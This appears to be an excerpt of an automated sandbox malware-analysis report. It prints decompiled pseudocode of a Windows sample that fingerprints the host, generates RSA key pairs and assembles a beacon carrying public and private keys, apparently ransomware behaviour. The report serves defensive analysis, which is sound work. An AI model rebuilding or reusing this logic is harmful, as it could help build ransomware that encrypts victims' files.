				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0F583BC0( &_v148);
				E0F587490( &_v236, __edx); // executed
				_t266 = E0F5872A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0F587D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0F5870A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0F5835C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xf592a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xf592a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0F585F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0F5854F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0F587D70( &_v200);
						return 0;
					}
				}
			}

APIs

Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C

Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000202,00003000,00000004), ref: 0F5874B7
Part of subcall function 0F587490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F5874C8
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000004), ref: 0F5874E6
Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F587510
Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
Part of subcall function 0F587490: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F58756E
Part of subcall function 0F587490: RegOpenKeyExW.KERNELBASE(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
Part of subcall function 0F587490: RegQueryValueExW.KERNELBASE(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
Part of subcall function 0F587490: RegCloseKey.KERNELBASE(00000000), ref: 0F5875D2

Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC

VirtualAlloc.KERNELBASE(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0F5858D0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0F585980
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0F585999
lstrlenA.KERNEL32(00000000), ref: 0F5859A2
lstrlenA.KERNEL32(?), ref: 0F5859AA
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0F5859BB
lstrlenA.KERNEL32(?), ref: 0F5859D5
lstrlenA.KERNEL32(00000000), ref: 0F5859FE
lstrlenA.KERNEL32(?), ref: 0F585A1E

Strings

&version=2.3.1r, xrefs: 0F585B7F
popkadurak, xrefs: 0F585BFE, 0F585C1A
&priv_key=, xrefs: 0F585B54
&pub_key=, xrefs: 0F585B1D
action=call&, xrefs: 0F585A88
&id=, xrefs: 0F585AD0
&subid=, xrefs: 0F585AE4

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$BinaryCryptNameString$CloseComputerHeapOpenProcessQueryUserValuewsprintf
String ID: &id=$&priv_key=$&pub_key=$&subid=$&version=2.3.1r$action=call&$popkadurak
API String ID: 1618292170-4215222798
Opcode ID: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
Instruction ID: b9584b2a845e0a2e827ca7c1910d1fc0087ab1b871bccb272c95d9676d165f48
Opcode Fuzzy Hash: ed4d01eab58d5800b8f374295f3d3ace532f31e026151068d10b980563f866e4
Instruction Fuzzy Hash: C0F1AC71208301AFD710EF24DC85B6BBBA9FF88725F04092DF585B7291E774A90ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 0F584B20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 182
threadsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _v8;
				void* _v12;
				CHAR* _v16;
				int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				int _v36;
				int _v40;
				int _v44;
				int _v48;
				int _v52;
				int _v60;
				char _v80;
				void* _t54;
				void* _t55;
				int _t79;
				void* _t81;
				short* _t97;
				void* _t114;

				Sleep(0x3e8); // executed
				_t54 = E0F5847D0(_t90, _t106); // executed
				if(_t54 == 0) {
					_t55 = CreateThread(0, 0, E0F582D30, 0, 0, 0); // executed
					_v8 = _t55;
					if(_v8 != 0) {
						if(WaitForSingleObject(_v8, 0x1388) == 0x102) {
							_t90 = _v8;
							TerminateThread(_v8, 0);
						}
						_t106 = _v8;
						CloseHandle(_v8); // executed
					}
					E0F5848C0(); // executed
					E0F5842B0(_t90, _t106); // executed
					E0F586550( &_v80); // executed
					_v40 = 0;
					_v36 = 0;
					_v28 = 0;
					_v44 = 0;
					E0F586500( &_v80,  &_v28,  &_v44,  &_v40,  &_v36);
					_v48 = 0;
					_v16 = 0;
					if(E0F584B00(_v28) == 0) {
						while(_v48 == 0) {
							_t81 = E0F585860(_v28, _v44, _v40, _v36,  &_v16); // executed
							_t114 = _t114 + 0xc;
							if(_t81 != 0) {
								_v48 = 1;
							} else {
								Sleep(0x2710);
							}
						}
						E0F5864C0( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0F584200();
							InitializeCriticalSection(0xf592a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0F583FF0( &_v80);
							} else {
								E0F5841D0(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xf592a48);
							__eflags = E0F583C70();
							if(__eflags != 0) {
								E0F5845B0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0F583DB0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xf592a44;
							if( *0xf592a44 != 0) {
								_t97 =  *0xf592a44; // 0x23f0000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0F583DB0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0);
			}

APIs

Sleep.KERNELBASE(000003E8), ref: 0F584B2B

Part of subcall function 0F5847D0: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
Part of subcall function 0F5847D0: lstrcpyW.KERNEL32 ref: 0F58484F
Part of subcall function 0F5847D0: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
Part of subcall function 0F5847D0: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
Part of subcall function 0F5847D0: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
Part of subcall function 0F5847D0: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B

ExitProcess.KERNEL32 ref: 0F584B3C
CreateThread.KERNELBASE ref: 0F584B51
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0F584B69
TerminateThread.KERNEL32(00000000,00000000), ref: 0F584B7C
CloseHandle.KERNEL32(00000000), ref: 0F584B86
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0F584BFA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F584C14
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F584C2D
ExitProcess.KERNEL32 ref: 0F584C35

Strings

open, xrefs: 0F584D90

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
Instruction ID: 17346e7ef18a8b9bef543064817a8e13a219e92cc9ee6d0296a6b9157c0ae95b
Opcode Fuzzy Hash: dd0cbba130fb7e83b4753fdc3b36268d457670b9af8aeeef44f642284472b79e
Instruction Fuzzy Hash: DC711170A4030AFBEB14EBE0DD59FEE7B74BB44712F104025E601BA2C1DBB8694ADB54

Uniqueness

Uniqueness Score: -1.00%

Function 0F5882B0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 111
encryptionlibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E0F5882B0(intOrPtr __ecx, void* __edx) {
				long* _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v34;
				short _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				long** _t37;
				void* _t40;
				struct HINSTANCE__* _t45;
				_Unknown_base(*)()* _t46;
				signed int _t54;
				long _t55;
				intOrPtr _t56;
				signed int _t58;
				signed int _t60;
				void* _t63;
				void* _t64;
				void* _t65;

				_t54 = 0;
				_v12 = __ecx;
				_t37 =  &_v8;
				_t63 = __edx;
				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000); // executed
				if(_t37 == 0) {
					L15:
					return _t54;
				} else {
					_t58 = 0;
					do {
						_t3 = _t58 + 0x61; // 0x61
						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
						_t58 = _t58 + 1;
					} while (_t58 < 0x1a);
					_t7 = _t63 + 1; // 0x1
					_t55 = _t7;
					_t40 = VirtualAlloc(0, _t55, 0x3000, 0x40); // executed
					_t64 = _t40;
					if(_t64 == 0 || _t63 >= _t55) {
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000);
						return 0;
					} else {
						_v48 = 0x70797243;
						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t45 = GetModuleHandleA( &_v32);
						if(_t45 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t46 = GetProcAddress(_t45, _t19);
							if(_t46 == 0) {
								goto L13;
							} else {
								_push(_t64);
								_push(_t63);
								_push(_v8);
								if( *_t46() == 0) {
									goto L13;
								} else {
									_t60 = 0;
									if(_t63 != 0) {
										_t56 = _v12;
										_v16 = 0x1a;
										do {
											asm("cdq");
											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
											_t60 = _t60 + 1;
										} while (_t60 < _t63);
									}
									_t54 = 1;
								}
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t45 = LoadLibraryA(_t18);
							if(_t45 == 0) {
								L13:
								_t54 = 0;
							} else {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t64, 0, 0x8000); // executed
						goto L15;
					}
				}
			}

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
VirtualAlloc.KERNELBASE(00000000,00000001,00003000,00000040), ref: 0F5882FB
GetModuleHandleA.KERNEL32(?), ref: 0F58834F
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883D7
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5883E5

Strings

Advapi32.dll, xrefs: 0F588359, 0F58835C
CryptGenRandomAdvapi32.dll, xrefs: 0F588367, 0F58836A

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
Instruction ID: f01aefa46416bb242e0ac05bfb1871327c79cb5ce4e052b8b584858dac1be2be
Opcode Fuzzy Hash: b4f569f273c729533baaee686f39f774d2f39718d2319693307fb1a54a19ce89
Instruction Fuzzy Hash: 9E314870A00209EBDB109FE4DD85BEEBB78FF04702F544069E601B6280EB389A17DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0F5863E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0F5863E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0); // executed
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E
CryptGenKey.ADVAPI32(0F584B9E,0000A400,08000001,?,?,0F584B9E), ref: 0F58644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F58646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F586486
CryptDestroyKey.ADVAPI32(?), ref: 0F586490
CryptReleaseContext.ADVAPI32(0F584B9E,00000000), ref: 0F58649C
CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F5864B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F5863ED, 0F586413, 0F5864A6

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
Instruction ID: 77e3b4d4d798aa6039f0574d410643d6e18703d3481dd7951f0722d0fd54af85
Opcode Fuzzy Hash: 20f1669ca2e543091642e227d390f746c93d75d9fd70526a21cd1632107d1df5
Instruction Fuzzy Hash: A9214475780305FBEB20EBA0DE89F9E3B79B748B11F504414F701BB1C0D6B9A915A761

Uniqueness

Uniqueness Score: -1.00%

Function 0F582F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0F582F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F582F74
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 0F582F8D

Strings

i)w, xrefs: 0F582FE3

Memory Dump Source

Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: i)w
API String ID: 4140748134-1280834553
